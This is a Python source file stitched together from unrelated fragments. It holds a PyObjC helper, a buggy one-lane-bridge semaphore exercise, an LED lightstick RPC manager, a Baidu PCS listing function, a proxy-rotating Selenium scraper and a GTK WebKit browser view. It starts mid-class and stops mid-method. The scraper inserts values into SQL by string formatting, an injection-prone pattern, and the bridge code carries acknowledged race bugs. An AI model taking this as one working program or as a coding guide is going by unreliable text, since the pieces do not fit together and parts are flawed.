    @staticmethod
    def pyobjc_method_signature(signature_str):
        """
        Return a PyObjCMethodSignature object for given signature string.
        :param signature_str: A byte string containing the type encoding for the method signature
        :return: A method signature object, assignable to attributes like __block_signature__
        :rtype: <type objc._method_signature>
        """
        _objc_so.PyObjCMethodSignature_WithMetaData.restype = ctypes.py_object
        return _objc_so.PyObjCMethodSignature_WithMetaData(
            ctypes.create_string_buffer(signature_str), None, False)

    @staticmethod
    def quote(string):
        # Minimal URL quoting; only spaces are escaped
        return string.replace(' ', '%20')
class OneLaneBridge(object):
    """
    A one-lane bridge allows multiple cars to pass in either direction, but
    at any point in time, all cars on the bridge must be going in the same
    direction.

    Cars wishing to cross should call the cross function, once they have
    crossed they should call finished()
    """

    def __init__(self):
        # TODO
        # Current direction allowed on the bridge and per-direction counters.
        self.status = 1  # 0 for left and 1 for right. Cars' direction on bridge.
        self.driving_left_num = 0
        self.waiting_to_left_num = 0
        self.sema_left = Semaphore(0)      # blocks cars waiting to go left
        self.driving_right_num = 0
        self.waiting_to_right_num = 0
        self.sema_right = Semaphore(0)     # blocks cars waiting to go right
        # variables for debug:
        self.start_count = 1
        self.fin_count = 1
        self.start_count_mutex = Semaphore(1)
        self.fin_count_mutex = Semaphore(1)

    def cross(self, direction):
        """wait for permission to cross the bridge.
        direction should be either north (0) or south (1)."""
        # TODO
        # with lock:
        # NOTE(review): the direction counters below are read and written
        # without holding a mutex (only the debug counter is protected), so
        # concurrent cross()/finished() calls can race — confirm intent.
        with self.start_count_mutex:
            print 'enter_cross:' + str(
                self.start_count), 'direction:', direction
            self.start_count += 1
        if direction == 1:  # toward right
            if self.status == 1:
                # Bridge already flowing right: drive straight on
                self.driving_right_num += 1
            elif self.status == 0:
                # Opposite flow: queue up and block until released
                self.waiting_to_right_num += 1
                self.sema_right.acquire()
            else:
                print 'error 2'
        elif direction == 0:  # toward left
            if self.status == 0:
                self.driving_left_num += 1
            elif self.status == 1:
                self.waiting_to_left_num += 1
                self.sema_left.acquire()
            else:
                print 'error 1'
        else:
            print 'At cross function: direction error!'

    def finished(self):
        # Called by a car once it has crossed: decrement the driving count
        # and, when the bridge empties, flip direction and release all
        # waiters going the other way.
        # NOTE(review): a released waiter never increments its own
        # driving_*_num, and a thread that flips status here immediately
        # falls through into the second branch — both look like bugs to
        # confirm against the assignment spec.
        # TODO
        # with lock2:
        if self.status == 1:
            if self.driving_right_num > 0:
                self.driving_right_num -= 1
                # Next line: change else to if
                if self.driving_right_num == 0:
                    # self.driving_right_num = 0
                    self.status = 0
                    for i in xrange(self.waiting_to_left_num):
                        self.sema_left.release()
                    self.waiting_to_left_num = 0
            # elif self.driving_right_num == 0:
            #     pass
            else:
                print 'error 3'
        if self.status == 0:
            if self.driving_left_num > 0:
                self.driving_left_num -= 1
                # Next line: change else to if
                if self.driving_left_num == 0:
                    # self.driving_left_num = 0
                    self.status = 1
                    for i in xrange(self.waiting_to_right_num):
                        self.sema_right.release()
                    self.waiting_to_right_num = 0
            # elif self.driving_left_num == 0:
            #     pass
            else:
                print 'error 4'
        with self.fin_count_mutex:
            print 'finish ' + str(self.fin_count)
            self.fin_count += 1
class WotabagManager(object):
    """RPC-controlled LED "wotagei" lightstick bag.

    Loads a YAML config (playlist, volume, RPC endpoint, logging), drives an
    LED strip in time with audio played through mpv, and exposes @public
    methods as the RPC API.  Playback runs on a background thread signalled
    to stop via the self._stopped Event.
    """

    def __init__(self, config_file):
        yaml = YAML(typ='safe')
        # config_file may be an already-open stream or a path
        if isinstance(config_file, IOBase):
            config = yaml.load(config_file)
        else:
            with open(config_file) as f:
                config = yaml.load(f)
        logging.config.dictConfig(config.get('logging', {}))
        self.logger = logging.getLogger('wotabag')
        self.rpc_host = config.get('rpc_host', '127.0.0.1')
        self.rpc_port = config.get('rpc_port', 60715)
        self._load_playlist(config.get('playlist', []))
        # Clamp configured volume into [0, 100]
        volume = int(config.get('volume', 0))
        if volume > 100:
            volume = 100
        elif volume < 0:
            volume = 0
        self.volume = volume
        self.current_track = 0
        self.status = WotabagStatus.IDLE
        # Guards self.status transitions
        self._status_lock = Semaphore()

        # init LED strip
        self.strip = init_strip()
        self.strip.begin()

        # init playback
        self.player = None
        self.song = None
        self._stopped = Event()
        self._stopped.set()
        self._playback_thread = None

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_value, traceback):
        # Stop any in-flight playback and terminate mpv on context exit
        if self.status == WotabagStatus.PLAYING:
            self._stopped.set()
            if self._playback_thread:
                self._playback_thread.join()
        if self.player:
            self.player.terminate()

    def _mpv_log(self, loglevel, component, message):
        # Map mpv log levels onto this manager's logger
        f = {
            'fatal': self.logger.critical,
            'error': self.logger.error,
            'warn': self.logger.warning,
            'info': self.logger.info,
            'verbose': self.logger.debug,
            'debug': self.logger.debug,
            'trace': self.logger.debug,
        }
        if loglevel in f:
            f[loglevel]('[MPV] {}: {}'.format(component, message))

    def _load_file(self, yaml_file):
        # Load one song's pattern YAML into self.song
        yaml = YAML(typ='safe')
        with open(yaml_file) as f:
            song = yaml.load(f)
        self.logger.debug('loaded {} ({})'.format(song['title'],
                                                  song['filename']))
        self.song = song

    def _load_playlist(self, playlist):
        # Build [(yaml_file, title), ...] from the configured playlist paths
        yaml = YAML(typ='safe')
        self.playlist = []
        for yaml_file in playlist:
            with open(yaml_file) as f:
                song = yaml.load(f)
            self.playlist.append((yaml_file, song['title']))

    def _play(self):
        # Restart playback from self.current_track on a fresh thread
        self._stop()
        self._stopped.clear()
        self._status_lock.acquire()
        self.status = WotabagStatus.PLAYING
        self._status_lock.release()
        self._playback_thread = Thread(target=self._wota_playback)
        self.logger.debug('starting wota playback thread')
        self._playback_thread.start()

    def _stop(self):
        # Signal the playback thread, join it, kill mpv, and blank the LEDs
        self._stopped.set()
        if self._playback_thread:
            self._playback_thread.join()
            self._playback_thread = None
            self.logger.debug('joined wota playback thread')
        if self.player:
            self.player.terminate()
            self.player = None
        self.song = None
        for i in range(self.strip.numPixels()):
            self.strip.setPixelColor(i, BladeColor.NONE.value)
        self.strip.show()
        self._status_lock.acquire()
        self.status = WotabagStatus.IDLE
        self._status_lock.release()

    def _wota_playback(self):
        """Playback thread body: play each remaining track with LED patterns."""
        while self.current_track < len(self.playlist):
            song, _ = self.playlist[self.current_track]
            self._load_file(song)
            if self.player:
                self.player.terminate()
            self.player = MPV(vid='no',
                              hwdec='mmal',
                              keep_open='yes',
                              volume=self.volume,
                              log_handler=self._mpv_log)
            self.player.play(self.song['filename'])

            # wait for mpv to actually start playing
            playback_lock = Semaphore(value=0)

            def observer(name, val):
                # time-pos becomes non-None once audio actually starts
                if val is not None:
                    playback_lock.release()

            self.player.observe_property('time-pos', observer)
            playback_lock.acquire()
            self.player.unobserve_property('time-pos', observer)

            start = time.time()
            ticks = 0
            # drift = 0
            bpm = 120
            # Per-section colors default to YOSHIKO until a pattern overrides them
            cur_colors = {
                'left': BladeColor.YOSHIKO,
                'center': BladeColor.YOSHIKO,
                'right': BladeColor.YOSHIKO,
            }
            # initial_offset is in milliseconds
            initial_offset = self.song.get('initial_offset', 0)
            if initial_offset:
                time.sleep((start + initial_offset / 1000) - time.time())
            last_tick = time.perf_counter()

            # play led patterns
            for pattern in self.song['patterns']:
                if 'bpm' in pattern:
                    bpm = pattern['bpm']
                # Update per-section colors; a list value becomes a color
                # tuple, a string a single BladeColor.  Unknown names are
                # silently ignored.
                for k in ['left', 'center', 'right']:
                    if k in pattern:
                        if isinstance(pattern[k], list):
                            colors = []
                            for c in pattern[k]:
                                color = c.upper()
                                if color in BladeColor.__members__:
                                    colors.append(BladeColor[color])
                            cur_colors[k] = tuple(colors)
                        else:
                            color = pattern[k].upper()
                            if color in BladeColor.__members__:
                                cur_colors[k] = BladeColor[color]
                kwargs = pattern.get('kwargs', {})
                kwargs.update(cur_colors)
                wota = WOTA_TYPE[pattern['type']](bpm=bpm,
                                                  strip=self.strip,
                                                  **kwargs)
                count = pattern.get('count', 1)
                for i in range(count):
                    for _ in range(len(wota)):
                        # Bail out promptly when stop was requested
                        if self._stopped.is_set():
                            return
                        next_tick = last_tick + wota.tick_s
                        # if i == 0 or i == count - 1:
                        #     loop = False
                        # else:
                        #     loop = True
                        loop = True
                        wota.tick(loop=loop)
                        # Sleep off whatever time remains until the next tick
                        diff = next_tick - time.perf_counter()
                        last_tick = next_tick
                        # drift = 0
                        if diff > 0:
                            time.sleep(diff)
                        # elif diff < 0:
                        #     drift = diff
                        ticks += 1

            with self.player._playback_cond:
                # wait for mpv to reach the end of the audio file or 5 seconds,
                # whichever comes first
                self.player._playback_cond.wait(5)

            # end of song, setup next track
            self.player.terminate()
            self.player = None
            for i in range(self.strip.numPixels()):
                self.strip.setPixelColor(i, BladeColor.NONE.value)
            self.strip.show()
            self.current_track += 1

        # Playlist exhausted: rewind to the first track and go idle
        self.current_track = 0
        self._status_lock.acquire()
        self.status = WotabagStatus.IDLE
        self._status_lock.release()

    @public
    def get_playlist(self):
        """Return this wotabag's playlist."""
        self.logger.info('[RPC] wotabag.get_playlist')
        return [title for _, title in self.playlist]

    @public
    def get_status(self):
        """Return current status."""
        self.logger.info('[RPC] wotabag.get_status')
        result = {
            'status': self.status.name,
            'volume': self.volume,
        }
        if self.status == WotabagStatus.IDLE:
            # When idle, current_track points at the next track to play
            if self.playlist:
                _, title = self.playlist[self.current_track]
                result['next_track'] = title
            else:
                result['next_track'] = None
        elif self.status == WotabagStatus.PLAYING:
            _, title = self.playlist[self.current_track]
            result['current_track'] = title
            next_track = self.current_track + 1
            if next_track < len(self.playlist):
                _, title = self.playlist[next_track]
                result['next_track'] = title
            else:
                result['next_track'] = None
        return result

    @public
    def get_volume(self):
        """Return current volume."""
        self.logger.info('[RPC] wotabag.get_volume')
        return self.volume

    @public
    def set_volume(self, volume):
        """Set volume."""
        self.logger.info('[RPC] wotabag.set_volume {}'.format(volume))
        # Clamp into [0, 100] and apply to the live player, if any
        volume = int(volume)
        if volume > 100:
            volume = 100
        elif volume < 0:
            volume = 0
        self.volume = volume
        if self.player:
            self.player.volume = self.volume
        return self.volume

    @public
    def get_colors(self):
        """Return list of available colors."""
        self.logger.info('[RPC] wotabag.get_colors')
        colors = ['None'] + \
            [x.name.capitalize() for x in aqours] + list(aqours_units.keys()) + ['Aqours Rainbow'] + \
            [x.name.capitalize() for x in saint_snow] + ['Saint Snow'] + \
            [x.name.capitalize() for x in muse] + list(muse_units.keys())
        return colors

    @public
    def set_color(self, color):
        """Set all LEDs to the specified color or color sequence."""
        self.logger.info('[RPC] wotabag.set_color {}'.format(color))
        # Resolve the color name to a tuple of BladeColors
        if color == 'Aqours Rainbow':
            colors = aqours_rainbow
        elif color in aqours_units:
            colors = aqours_units[color]
        elif color == 'Saint Snow':
            colors = saint_snow
        elif color in muse_units:
            colors = muse_units[color]
        elif color.upper() in BladeColor.__members__:
            colors = (BladeColor[color.upper()],)
        else:
            raise BadRequestError('Unknown color')
        strip = self.strip
        if len(colors) == 1:
            # One color: fill the whole strip
            for i in range(strip.numPixels()):
                strip.setPixelColor(i, colors[0].value)
            strip.show()
        elif len(colors) <= 3:
            # Up to three colors: one per blade column
            if len(colors) == 2:
                colors = colors + (colors[0],)
            for x, color in (enumerate(colors)):
                for y in range(9):
                    strip.setPixelColor(pixel_index(x, y), color.value)
            strip.show()
        elif len(colors) == 9:
            # Nine colors: one per row, repeated across the three columns
            for x in range(3):
                for y, color in enumerate(colors):
                    strip.setPixelColor(pixel_index(x, y), color.value)
            strip.show()

    @public
    def power_off(self):
        """Power off the device.

        Note:
            If 'shutdown -h' fails, the returncode will be returned. If
            shutdown succeeds, the connection will be dropped immediately
            (this will appear as a returned None to a tinyrpc client).
        """
        self.logger.info('[RPC] wotabag.power_off')
        # clear led's before power off otherwise they will stay turned on until
        # the separate led battery source is manually switched off
        for i in range(self.strip.numPixels()):
            self.strip.setPixelColor(i, BladeColor.NONE.value)
        self.strip.show()
        proc = subprocess.run(['shutdown', '-h', 'now'])
        return proc.returncode

    @public
    def play(self):
        """Start playback of the next song."""
        self.logger.info('[RPC] wotabag.play')
        self._play()

    @public
    def play_index(self, index):
        """Start playback of the specified song."""
        self.logger.info('[RPC] wotabag.play_index {}'.format(index))
        if index >= len(self.playlist) or index < 0:
            raise BadRequestError('Invalid song index')
        self.current_track = index
        self._play()

    @public
    def stop(self):
        """Stop playback."""
        self.logger.info('[RPC] wotabag.stop')
        self._stop()

    @public
    def test_pattern(self):
        """Display test color wipe patterns."""
        self.logger.info('[RPC] wotabag.test_pattern')
        gevent.spawn_later(0, test_wipe, self.strip, clear=True)
def list_file(
    api: BaiduPCSApi,
    remotepath: str,
    desc: bool = False,
    name: bool = False,
    time: bool = False,
    size: bool = False,
    recursive: bool = False,
    sifters: List[Sifter] = [],  # NOTE(review): mutable default; only read here, but confirm no caller mutates it
    highlight: bool = False,
    rapiduploadinfo_file: Optional[str] = None,
    user_id: Optional[int] = None,
    user_name: Optional[str] = None,
    show_size: bool = False,
    show_date: bool = False,
    show_md5: bool = False,
    show_absolute_path: bool = False,
    show_dl_link: bool = False,
    show_hash_link: bool = False,
    hash_link_protocol: str = PcsRapidUploadInfo.default_hash_link_protocol(),
    check_md5: bool = True,
    csv: bool = False,
    only_dl_link: bool = False,
    only_hash_link: bool = False,
):
    """List a remote path, optionally with download/rapid-upload links.

    For a directory the listing is fetched (with the given sort flags);
    for a file its metadata is used.  Results are filtered through
    `sifters`, optionally enriched concurrently with download links and
    rapid-upload info, displayed via `display_files`, and the function
    recurses into sub-directories when `recursive` is set.
    """
    is_dir = api.is_dir(remotepath)
    if is_dir:
        pcs_files = api.list(remotepath, desc=desc, name=name, time=time, size=size)
    else:
        pcs_files = api.meta(remotepath)

    pcs_files = sift(pcs_files, sifters)
    if not pcs_files:
        return

    # Concurrently request rapiduploadinfo
    max_workers = DEFAULT_MAX_WORKERS
    # The semaphore caps how many requests are in flight; sure_release
    # releases it when each task finishes.
    semaphore = Semaphore(max_workers)
    with ThreadPoolExecutor(max_workers=max_workers) as executor:
        futs = {}
        for i in range(len(pcs_files)):
            if pcs_files[i].is_dir:
                # Links only make sense for files.
                continue

            semaphore.acquire()
            fut = executor.submit(
                sure_release,
                semaphore,
                _get_download_link_and_rapid_upload_info,
                api,
                pcs_files[i],
                show_dl_link=show_dl_link,
                show_hash_link=show_hash_link,
                check_md5=check_md5,
            )
            # Map the future back to the index so the entry can be updated.
            futs[fut] = i

        for fut in as_completed(futs):
            i = futs[fut]
            e = fut.exception()
            if e is None:
                dl_link, rpinfo = fut.result()
                # Persist rapid-upload info when a target file was given.
                if rapiduploadinfo_file and rpinfo:
                    save_rapid_upload_info(
                        rapiduploadinfo_file,
                        rpinfo.slice_md5,
                        rpinfo.content_md5,
                        rpinfo.content_crc32,
                        rpinfo.content_length,
                        remotepath=pcs_files[i].path,
                        user_id=user_id,
                        user_name=user_name,
                    )
                pcs_files[i] = pcs_files[i]._replace(
                    dl_link=dl_link, rapid_upload_info=rpinfo
                )
                # "only" modes print links directly instead of a table.
                if only_dl_link and dl_link:
                    print(dl_link)
                if only_hash_link and rpinfo:
                    hash_link = getattr(rpinfo, hash_link_protocol)()
                    print(hash_link)
            else:
                logger.error(
                    "`list_file`: `_get_download_link_and_rapid_upload_info` error: %s",
                    e,
                )

    if not only_dl_link and not only_hash_link:
        display_files(
            pcs_files,
            remotepath,
            sifters=sifters,
            highlight=highlight,
            show_size=show_size,
            show_date=show_date,
            show_md5=show_md5,
            show_absolute_path=show_absolute_path,
            show_dl_link=show_dl_link,
            show_hash_link=show_hash_link,
            hash_link_protocol=hash_link_protocol,
            csv=csv,
        )

    # Depth-first recursion into sub-directories with identical options.
    if is_dir and recursive:
        for pcs_file in pcs_files:
            if pcs_file.is_dir:
                list_file(
                    api,
                    pcs_file.path,
                    desc=desc,
                    name=name,
                    time=time,
                    size=size,
                    recursive=recursive,
                    sifters=sifters,
                    highlight=highlight,
                    rapiduploadinfo_file=rapiduploadinfo_file,
                    user_id=user_id,
                    user_name=user_name,
                    show_size=show_size,
                    show_date=show_date,
                    show_md5=show_md5,
                    show_absolute_path=show_absolute_path,
                    show_dl_link=show_dl_link,
                    show_hash_link=show_hash_link,
                    hash_link_protocol=hash_link_protocol,
                    check_md5=check_md5,
                    csv=csv,
                    only_dl_link=only_dl_link,
                    only_hash_link=only_hash_link,
                )
class page:
    """Multi-threaded page scraper.

    Worker threads pull page identifiers from `tmp_q`, fetch each page with a
    selenium Chrome driver (either via the local IP or a rented proxy IP from
    an external API), and write results to a database.  Failed pages are
    re-queued and retried with a fresh IP.
    """

    def __init__(self):
        self.tmp_q = Queue()          # pending page identifiers
        self.ip_q = Queue()           # history of proxy IPs consumed
        self.sema = Semaphore(1)      # serializes proxy-IP API requests
        self.__init_localhost_q()

    def get_ip(self):
        """Fetch one proxy "ip:port" string from the external API (serialized)."""
        self.sema.acquire()
        url = """http://ip.11jsq.com/index.php/api/entry?method=proxyServer.generate_api_url&packid=0&fa=0&fetch_key=&qty=1&time=101&pro=&city=&port=1&format=txt&ss=1&css=&dt=1&specialTxt=3&specialJson="""
        r = requests.get(url)
        # Brief pause to avoid hammering the rate-limited IP vendor.
        time.sleep(1)
        self.ip_q.put(r.text)
        self.sema.release()
        return r.text

    def __init_localhost_q(self, num=2):
        # Tokens allowing up to `num` workers to use the local IP directly.
        self.localhost_q = Queue()
        for i in range(num):
            self.localhost_q.put(i)

    def __init_tmp_q(self, arr):
        # Reset the work queue to exactly the items in `arr`.
        self.tmp_q.queue.clear()
        for i in arr:
            self.tmp_q.put(i)

    def __read_thread(self, f):
        """One worker pass: build a driver, then drain pages via `f(driver, x)`.

        Returns True on a clean drain, False on any failure (caller retries).
        """
        conp = self.conp
        if self.localhost_q.empty():
            # No local-IP tokens left: go through a rented proxy.
            chrome_option = webdriver.ChromeOptions()
            ip = self.get_ip()
            #ip="1.28.0.90:20455"
            print("本次ip %s" % ip)
            # NOTE(review): the dots in this pattern are unescaped, so they
            # match any character -- looser than a strict IPv4 check.
            if re.match(
                    "[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}:[0-9]{1,5}",
                    ip) is None:
                print("ip不合法")
                return False
            chrome_option.add_argument("--proxy-server=http://%s" % (ip))
            try:
                driver = webdriver.Chrome(chrome_options=chrome_option)
                driver.minimize_window()
                driver.set_page_load_timeout(20)
            except Exception as e:
                traceback.print_exc()
                driver.quit()
                return False
        else:
            try:
                print("使用本机ip")
                # Consume a local-IP token.
                self.localhost_q.get()
                driver = webdriver.Chrome()
                driver.minimize_window()
                driver.set_page_load_timeout(20)
            except Exception as e:
                traceback.print_exc()
                driver.quit()
                return False
        while not self.tmp_q.empty():
            x = self.tmp_q.get()
            if x is None:
                continue
            try:
                df = f(driver, x)
                self.db_write(conp, x, df)
                time.sleep(0.1)
                size = self.tmp_q.qsize()
                if size % 100 == 0:
                    print("还剩 %d 页" % size)
            except Exception as e:
                traceback.print_exc()
                print("第 %s 页面异常" % x)
                # Put the failed page back so another pass can retry it.
                self.tmp_q.put(x)
                driver.quit()
                return False
        driver.quit()
        print("线程正常退出")
        return True

    def read_thread(self, f):
        """Retry __read_thread up to 10 times, switching IP on each failure."""
        num = 10
        flag = self.__read_thread(f)
        while not flag and num > 0:
            num -= 1
            # NOTE(review): message computes (5 - num) although the retry
            # budget starts at 10 -- the printed attempt number looks off.
            print("切换ip,本线程第%d次" % (5 - num))
            print("已经消耗ip %d 个" % self.ip_q.qsize())
            flag = self.__read_thread(f)

    def read_threads(self, f, arr, num=10):
        """Scrape all pages in `arr` with up to `num` worker threads."""
        bg = time.time()
        ths = []
        dfs = []
        total = len(arr)
        # Scale the thread count down for small workloads.
        if total <= 5:
            num = 1
        if total != 0:
            if num / total > 1:
                num = int(total / 5) + 1 if int(total / 5) + 1 < 4 else num
        print("本次共 %d 个页面,共%d 个线程" % (total, num))
        self.__init_tmp_q(arr)
        for _ in range(num):
            t = Thread(target=self.read_thread, args=(f, ))
            ths.append(t)
        for t in ths:
            t.start()
        for t in ths:
            t.join()
        # Refill local-IP tokens, then make one final single-threaded pass
        # over anything the workers left behind.
        self.__init_localhost_q()
        left_page = self.tmp_q.qsize()
        print("剩余 %d页" % (left_page))
        if left_page > 0:
            self.read_thread(f)
            left_page = self.tmp_q.qsize()
            print("剩余 %d页" % (left_page))
        ed = time.time()
        cost = ed - bg
        if cost < 100:
            print("耗时%d 秒" % cost)
        else:
            print("耗时%.4f 分" % (cost / 60))

    def db_write(self, conp, href, page):
        """Insert one (href, page) row; conp = [user, pw, host, db, schema, table]."""
        dbtype = "postgresql"
        if dbtype == 'postgresql':
            con = psycopg2.connect(user=conp[0], password=conp[1], host=conp[2],
                                   port="5432", database=conp[3])
        elif dbtype == 'mssql':
            con = pymssql.connect(user=conp[0], password=conp[1], host=conp[2],
                                  database=conp[3])
        elif dbtype == 'oracle':
            con = cx_Oracle.connect("%s/%s@%s/%s" % (conp[0], conp[1], conp[2], conp[3]))
        else:
            con = MySQLdb.connect(user=conp[0], passwd=conp[1], host=conp[2],
                                  db=conp[3], charset='utf8')
        # con.set_character_set('utf8')
        # cur.execute('SET NAMES utf8;')
        # cur.execute('SET CHARACTER SET utf8;')
        # cur.execute('SET character_set_connection=utf8;')
        # Values are spliced in with PostgreSQL dollar-quoting ($lmf$...$lmf$)
        # rather than bound parameters.
        sql = """insert into %s.%s values($lmf$%s$lmf$,$lmf$%s$lmf$)""" % (
            conp[4], conp[5], href, page)
        cur = con.cursor()
        cur.execute(sql)
        con.commit()
        cur.close()
        con.close()

    def db_write_many(self, conp, data):
        """Bulk-insert rows from `data` into conp[4].conp[5]."""
        dbtype = "postgresql"
        if dbtype == 'postgresql':
            con = psycopg2.connect(user=conp[0], password=conp[1], host=conp[2],
                                   port="5432", database=conp[3])
        elif dbtype == 'mssql':
            con = pymssql.connect(user=conp[0], password=conp[1], host=conp[2],
                                  database=conp[3])
        elif dbtype == 'oracle':
            con = cx_Oracle.connect("%s/%s@%s/%s" % (conp[0], conp[1], conp[2], conp[3]))
        else:
            con = MySQLdb.connect(user=conp[0], passwd=conp[1], host=conp[2],
                                  db=conp[3], charset='utf8')
        # cur=con.cursor()
        # con.set_character_set('utf8')
        # cur.execute('SET NAMES utf8;')
        # cur.execute('SET CHARACTER SET utf8;')
        # cur.execute('SET character_set_connection=utf8;')
        # NOTE(review): this statement contains the literal column names
        # instead of %s placeholders, so executemany never binds the values
        # in `data` -- this looks like a bug; verify against callers.
        sql = """insert into %s.%s values(href,page)""" % (conp[4], conp[5])
        cur = con.cursor()
        cur.executemany(sql, data)
        con.commit()
        cur.close()
        con.close()

    def db_command(self, sql, conp):
        """Execute a single SQL statement against the database and commit."""
        dbtype = "postgresql"
        if dbtype == 'postgresql':
            con = psycopg2.connect(user=conp[0], password=conp[1], host=conp[2],
                                   port="5432", database=conp[3])
        elif dbtype == 'mssql':
            con = pymssql.connect(user=conp[0], password=conp[1], host=conp[2],
                                  database=conp[3])
        elif dbtype == 'oracle':
            con = cx_Oracle.connect("%s/%s@%s/%s" % (conp[0], conp[1], conp[2], conp[3]))
        else:
            con = MySQLdb.connect(user=conp[0], passwd=conp[1], host=conp[2],
                                  db=conp[3], charset='utf8')
        # con.set_character_set('utf8')
        # cur.execute('SET NAMES utf8;')
        # cur.execute('SET CHARACTER SET utf8;')
        # cur.execute('SET character_set_connection=utf8;')
        cur = con.cursor()
        cur.execute(sql)
        con.commit()
        cur.close()
        con.close()

    def write(self, **arg):
        """Entry point: ensure the target table exists, then scrape and store.

        Expected keys: tb, conp, f, num, arr.  Returns the number of pages
        left unprocessed.
        """
        tb = arg['tb']
        conp = arg["conp"]
        f = arg["f"]
        num = arg["num"]
        arr = arg["arr"]
        sql = "create table if not exists %s.%s(href text,page text)" % (
            conp[4], tb)
        self.db_command(sql, conp)
        print("创建表if不存在")
        # The table name is appended so db_write can address it via conp[5].
        conp.append(tb)
        print(conp)
        self.conp = conp
        self.read_threads(f=f, num=num, arr=arr)
        return self.tmp_q.qsize()
class BrowserView:
    """GTK/WebKit window hosting a webview, with an optional JS<->Python bridge.

    JS results are passed back synchronously by storing them in the document
    title and signalling `_js_result_semaphore`; bridge calls travel through
    the window status bar text.
    """

    # Singleton-style handle to the most recently created view.
    instance = None

    class JSBridge:
        """Dispatches JS-originated calls to the registered Python api object."""

        def __init__(self, api_instance):
            self.api = api_instance
            # Unique token used to delimit bridge messages in window.status.
            self.uid = uuid1().hex[:8]

        def call(self, func_name, param):
            # JS sends the literal string 'undefined' for a missing argument.
            if param == 'undefined':
                param = None

            return _js_bridge_call(self.api, func_name, param)

    def __init__(self, title, url, width, height, resizable, fullscreen,
                 min_size, confirm_quit, background_color, debug, js_api,
                 webview_ready):
        BrowserView.instance = self
        self.webview_ready = webview_ready
        self.is_fullscreen = False
        # Released when a JS evaluation result is ready (or window closes).
        self._js_result_semaphore = Semaphore(0)
        self.load_event = Event()
        self.js_bridge = None

        glib.threads_init()
        window = gtk.Window(title=title)

        if resizable:
            window.set_size_request(min_size[0], min_size[1])
            window.resize(width, height)
        else:
            window.set_size_request(width, height)

        window.set_resizable(resizable)
        window.set_position(gtk.WindowPosition.CENTER)

        # Set window background color
        style_provider = gtk.CssProvider()
        style_provider.load_from_data(
            'GtkWindow {{ background-color: {}; }}'.format(background_color).encode())
        gtk.StyleContext.add_provider_for_screen(
            Gdk.Screen.get_default(),
            style_provider,
            gtk.STYLE_PROVIDER_PRIORITY_APPLICATION)

        scrolled_window = gtk.ScrolledWindow()
        window.add(scrolled_window)
        self.window = window

        if confirm_quit:
            self.window.connect('delete-event', self.on_destroy)
        else:
            self.window.connect('delete-event', self.close_window)

        if js_api:
            self.js_bridge = BrowserView.JSBridge(js_api)

        self.webview = webkit.WebView()
        self.webview.connect('notify::visible', self.on_webview_ready)
        self.webview.connect('document-load-finished', self.on_load_finish)
        # Status-bar changes carry JS bridge messages; see on_status_change.
        self.webview.connect('status-bar-text-changed', self.on_status_change)
        self.webview.props.settings.props.enable_default_context_menu = False
        # Start invisible; shown once the document finishes loading.
        self.webview.props.opacity = 0.0
        scrolled_window.add(self.webview)
        window.show_all()

        if url is not None:
            self.webview.load_uri(url)

        if fullscreen:
            self.toggle_fullscreen()

    def close_window(self, *data):
        # Drain pending GTK events before tearing the window down.
        while gtk.events_pending():
            gtk.main_iteration()

        self.window.destroy()
        gtk.main_quit()
        # Unblock any evaluate_js() caller waiting on a result.
        self._js_result_semaphore.release()

    def on_destroy(self, widget=None, *data):
        # Ask the user to confirm quitting before closing.
        # NOTE(review): the flags are combined with `&` -- GTK flag values are
        # normally OR-ed together; verify this is intentional.
        dialog = gtk.MessageDialog(
            parent=self.window,
            flags=gtk.DialogFlags.MODAL & gtk.DialogFlags.DESTROY_WITH_PARENT,
            type=gtk.MessageType.QUESTION,
            buttons=gtk.ButtonsType.OK_CANCEL,
            message_format=localization['global.quitConfirmation'])
        result = dialog.run()
        if result == gtk.ResponseType.OK:
            self.close_window()
        else:
            dialog.destroy()
        # Returning True stops the default delete-event handling.
        return True

    def on_webview_ready(self, arg1, arg2):
        glib.idle_add(self.webview_ready.set)

    def on_load_finish(self, webview, webframe):
        # Show the webview if it's not already visible
        if not webview.props.opacity:
            glib.idle_add(webview.set_opacity, 1.0)

        if self.js_bridge:
            self._set_js_api()
        else:
            self.load_event.set()

    def on_status_change(self, webview, status):
        try:
            delim = '_' + self.js_bridge.uid + '_'
        except AttributeError:
            # No bridge registered: nothing to dispatch.
            return

        # Check if status was updated by a JSBridge call
        if status.startswith(delim):
            _, func_name, param = status.split(delim)
            return_val = self.js_bridge.call(func_name, param)
            # Give back the return value to JS as a string
            code = 'pywebview._bridge.return_val = "{0}";'.format(
                _escape_string(str(return_val)))
            webview.execute_script(code)

    def show(self):
        gtk.main()

    def destroy(self):
        self.window.emit('delete-event', Gdk.Event())

    def toggle_fullscreen(self):
        if self.is_fullscreen:
            self.window.unfullscreen()
        else:
            self.window.fullscreen()

        self.is_fullscreen = not self.is_fullscreen

    def create_file_dialog(self, dialog_type, directory, allow_multiple,
                           save_filename, file_types):
        """Show an open/save/folder chooser; return selected paths or None."""
        if dialog_type == FOLDER_DIALOG:
            gtk_dialog_type = gtk.FileChooserAction.SELECT_FOLDER
            title = localization["linux.openFolder"]
            button = gtk.STOCK_OPEN
        elif dialog_type == OPEN_DIALOG:
            gtk_dialog_type = gtk.FileChooserAction.OPEN
            if allow_multiple:
                title = localization['linux.openFiles']
            else:
                title = localization['linux.openFile']
            button = gtk.STOCK_OPEN
        elif dialog_type == SAVE_DIALOG:
            gtk_dialog_type = gtk.FileChooserAction.SAVE
            title = localization['global.saveFile']
            button = gtk.STOCK_SAVE

        dialog = gtk.FileChooserDialog(
            title, self.window, gtk_dialog_type,
            (gtk.STOCK_CANCEL, gtk.ResponseType.CANCEL,
             button, gtk.ResponseType.OK))

        dialog.set_select_multiple(allow_multiple)
        dialog.set_current_folder(directory)
        self._add_file_filters(dialog, file_types)

        if dialog_type == SAVE_DIALOG:
            dialog.set_current_name(save_filename)

        response = dialog.run()

        if response == gtk.ResponseType.OK:
            file_name = dialog.get_filenames()
        else:
            file_name = None

        dialog.destroy()
        return file_name

    def _add_file_filters(self, dialog, file_types):
        # Each entry is parsed into "Description (ext1;ext2)" filter patterns.
        for s in file_types:
            description, extensions = _parse_file_type(s)

            f = gtk.FileFilter()
            f.set_name(description)
            for e in extensions.split(';'):
                f.add_pattern(e)

            dialog.add_filter(f)

    def get_current_url(self):
        uri = self.webview.get_uri()
        return uri

    def load_url(self, url):
        self.load_event.clear()
        self.webview.load_uri(url)

    def load_html(self, content, base_uri):
        self.load_event.clear()
